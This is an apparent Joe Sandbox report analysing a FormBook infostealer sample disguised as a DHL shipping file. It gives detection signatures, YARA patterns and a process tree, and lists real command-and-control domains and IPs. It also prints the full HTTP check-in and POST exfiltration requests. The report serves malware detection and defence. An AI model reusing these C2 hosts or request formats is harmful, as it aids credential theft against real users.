Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL 0737-12182024.exe

Overview

General Information

Sample name:DHL 0737-12182024.exe
Analysis ID:1578024
MD5:ec3ba2f9b2d0b8236ac14326f17c2512
SHA1:83868d22c1f3437a6ebc5cda29ad0d8cb75c43a6
SHA256:15bb7ea4eaf34d92908626f1f1898e3bdc5a19fd086df4808a590c00c7285d74
Tags:DHLexeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL 0737-12182024.exe (PID: 5876 cmdline: "C:\Users\user\Desktop\DHL 0737-12182024.exe" MD5: EC3BA2F9B2D0B8236AC14326F17C2512)
    • svchost.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\DHL 0737-12182024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • MPhqOtiHUlL.exe (PID: 3660 cmdline: "C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 5260 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • MPhqOtiHUlL.exe (PID: 5956 cmdline: "C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7056 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL 0737-12182024.exe", CommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", ParentImage: C:\Users\user\Desktop\DHL 0737-12182024.exe, ParentProcessId: 5876, ParentProcessName: DHL 0737-12182024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", ProcessId: 7120, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DHL 0737-12182024.exe", CommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", ParentImage: C:\Users\user\Desktop\DHL 0737-12182024.exe, ParentProcessId: 5876, ParentProcessName: DHL 0737-12182024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", ProcessId: 7120, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T07:50:35.888894+010020507451Malware Command and Control Activity Detected192.168.2.549740154.215.72.11080TCP
            2024-12-19T07:51:09.555891+010020507451Malware Command and Control Activity Detected192.168.2.549819116.50.37.24480TCP
            2024-12-19T07:52:32.960227+010020507451Malware Command and Control Activity Detected192.168.2.54987785.159.66.9380TCP
            2024-12-19T07:52:47.659862+010020507451Malware Command and Control Activity Detected192.168.2.54998891.195.240.9480TCP
            2024-12-19T07:53:11.238787+010020507451Malware Command and Control Activity Detected192.168.2.54999266.29.149.4680TCP
            2024-12-19T07:53:26.602852+010020507451Malware Command and Control Activity Detected192.168.2.549996195.110.124.13380TCP
            2024-12-19T07:53:57.895694+010020507451Malware Command and Control Activity Detected192.168.2.550000217.196.55.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.goldenjade-travel.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbLAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: DHL 0737-12182024.exeReversingLabs: Detection: 57%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: DHL 0737-12182024.exeJoe Sandbox ML: detected
            Source: DHL 0737-12182024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MPhqOtiHUlL.exe, 00000003.00000002.4524073743.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp, MPhqOtiHUlL.exe, 00000006.00000000.2293045863.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 0737-12182024.exe, 00000000.00000003.2072424792.0000000003570000.00000004.00001000.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2073603863.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2129558471.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128074509.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2225656804.000000000315B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2228176846.000000000330F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.000000000365E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 0737-12182024.exe, 00000000.00000003.2072424792.0000000003570000.00000004.00001000.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2073603863.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2129558471.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128074509.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2225656804.000000000315B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2228176846.000000000330F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.000000000365E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2191743013.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226000633.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4523724213.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4525505296.0000000003AEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2513390369.00000000213FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4525505296.0000000003AEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2513390369.00000000213FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2191743013.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226000633.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4523724213.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0088DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0088DBBE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0085C2A2 FindFirstFileExW,0_2_0085C2A2
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008968EE FindFirstFileW,FindClose,0_2_008968EE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0089698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0089698F
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0088D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0088D076
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0088D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0088D3A9
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00899642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00899642
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0089979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0089979D
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00899B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00899B2B
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00895C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00895C97

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49740 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49819 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49877 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 66.29.149.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 217.196.55.202:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 91.195.240.94:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0089CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0089CE44
            Source: global trafficHTTP traffic detected: GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?UT5tTdKX=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&sLRH=86fTArmPbL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?UT5tTdKX=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&sLRH=86fTArmPbL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: global trafficDNS traffic detected: DNS query: www.shenzhoucui.com
            Source: global trafficDNS traffic detected: DNS query: www.b301.space
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 55 54 35 74 54 64 4b 58 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d Data Ascii: UT5tTdKX=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
